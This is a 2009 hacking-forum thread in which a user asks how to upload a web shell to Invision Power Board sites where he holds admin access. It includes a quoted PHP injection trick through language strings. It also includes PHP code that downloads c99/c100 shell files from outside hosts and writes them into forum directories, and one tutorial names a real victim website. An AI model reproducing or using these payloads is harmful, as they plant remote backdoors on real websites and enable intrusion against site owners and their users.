 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 387
Members: 0
Total: 387
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Uploading Shell VIA IPB 2.3.5 |
 |
Posted: Sat Aug 29, 2009 5:39 am |
|
|
Mooka91 |
Advanced user |

 |
|
Joined: Aug 15, 2009 |
Posts: 73 |
|
|
|
 |
 |
 |
|
Hey guys,
Ive got a few IPB sites i have Root admin accounts on, Im wondering how i can Upload a shell.
I have tried this
waraxe wrote: |
This trick is working even against current IPB version!
Just go to admin-->Look and Feel-->Manage Languages
Then choose section, for example: public_help
Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"
Add some php code, so it becomes as:
Code: |
Choose a topic from the list, or search for a topic
${${phpinfo()}}
|
Save changes. Then go to help section:
http://localhost/ipb.3.0.0.rc2/index.php?app=core&module=help
... and php code will be executed
 |
To no avail, I have a feeling i am doing something wrong, Can somebody post me an In depth guide, or video... or something??
I am using
Code: | $linky="http://MYSITE/c99.txt";
$saved="/usr/home/www/site/public_html/forums/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
Using this shell
Code: | http://www.hack0wn.com/forum/index.php?topic=325.0 |
Thanks.
Edit:
Also tried this, But the English is shocking, To hard for me to understand.
Code: | Hi everybody
Today i make video tutorial upload shell on invision power board
Let's start
victim: http://www.malaysianwings.com/
first
Go to "Tools & Settings", select any of them, then press "Add New Setting"
next
then in line "Raw PHP code to eval before showing and saving?" write php code like this:
php code is:
$linky="http://yugj.biz/c100.txt";
$saved="/home/malaysi4/public_html/forum/c.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
$linky="link shell .txt"; ==> http://yugj.biz/c100.txt
$saved="path victim"; ==> path
i need find it
/home/malaysi4/public_html/ ==> path
the end.
made by YuGj.
|
|
|
|
|
|
 |
 |
|
 |
Posted: Sun Aug 30, 2009 10:58 pm |
|
|
gibbocool |
Advanced user |

 |
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
 |
 |
 |
|
can you run any PHP code at all? |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|